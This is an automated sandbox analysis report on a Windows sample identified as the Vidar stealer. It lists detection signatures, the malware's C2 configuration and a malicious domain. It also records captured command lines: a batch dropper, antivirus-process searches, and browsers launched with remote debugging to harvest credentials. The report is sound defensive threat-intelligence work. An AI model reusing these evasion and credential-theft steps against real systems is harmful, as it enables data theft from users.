Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nB52P46OJD.exe

Overview

General Information

Sample name:nB52P46OJD.exe
renamed because original name is a hash value
Original sample name:c6e90b3a98ecb4ab74a9aaf8155d1bc0.exe
Analysis ID:1576056
MD5:c6e90b3a98ecb4ab74a9aaf8155d1bc0
SHA1:0a29a790ab82dda61c5622586fbdbf46223b2989
SHA256:08bae1bb8a881ff6a6a25f988d73def21b6d65d262960bc4706534f479b85b62
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • nB52P46OJD.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\nB52P46OJD.exe" MD5: C6E90B3A98ECB4AB74A9AAF8155D1BC0)
    • cmd.exe (PID: 7852 cmdline: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7940 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7948 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7984 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7992 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8032 cmdline: cmd /c md 615578 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 8048 cmdline: findstr /V "applied" Manually MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8068 cmdline: cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Participating.com (PID: 8084 cmdline: Participating.com w MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 2296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 2168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 6476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3720 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • choice.exe (PID: 8100 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 1056 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7848 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Participating.com PID: 8084JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: Participating.com PID: 8084JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Signatures

            Sigma detected: Browser Started with Remote Debugging
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Participating.com w, ParentImage: C:\Users\user\AppData\Local\Temp\615578\Participating.com, ParentProcessId: 8084, ParentProcessName: Participating.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2296, ProcessName: chrome.exe
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\nB52P46OJD.exe", ParentImage: C:\Users\user\Desktop\nB52P46OJD.exe, ParentProcessId: 7768, ParentProcessName: nB52P46OJD.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, ProcessId: 7852, ProcessName: cmd.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Search for Antivirus process
            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7992, ProcessName: findstr.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T13:46:49.869743+010020442471Malware Command and Control Activity Detected116.203.12.114443192.168.2.849716TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T13:46:52.157474+010020518311Malware Command and Control Activity Detected116.203.12.114443192.168.2.849718TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T13:46:47.571950+010020490871A Network Trojan was detected192.168.2.849715116.203.12.114443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://sedone.onlineAvira URL Cloud: Label: malware
            Source: https://sedone.online/2)Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 0000000B.00000003.1819474121.0000000005326000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
            Multi AV Scanner detection for submitted file
            Source: nB52P46OJD.exeReversingLabs: Detection: 18%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
            Source: nB52P46OJD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49805 version: TLS 1.2
            Source: nB52P46OJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cryptosetup.pdbGCTL source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: Binary string: cryptosetup.pdb source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4DC54
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A087
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A1E2
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00D4E472
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00D5A570
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D566DC FindFirstFileW,FindNextFileW,FindClose,11_2_00D566DC
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1C622 FindFirstFileExW,11_2_00D1C622
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00D573D4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D57333 FindFirstFileW,FindClose,11_2_00D57333
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4D921
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: chrome.exeMemory has grown: Private usage: 8MB later: 39MB

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:49715 -> 116.203.12.114:443
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.8:49718
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.8:49716
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199807592927
            Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
            Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
            Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
            Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
            Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
            Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
            Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
            Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
            Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
            Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
            Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
            Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.152
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: unknownTCP traffic detected without corresponding DNS query: 23.200.88.31
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5D889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_00D5D889
            Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
            Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
            Source: global trafficHTTP traffic detected: GET /b?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
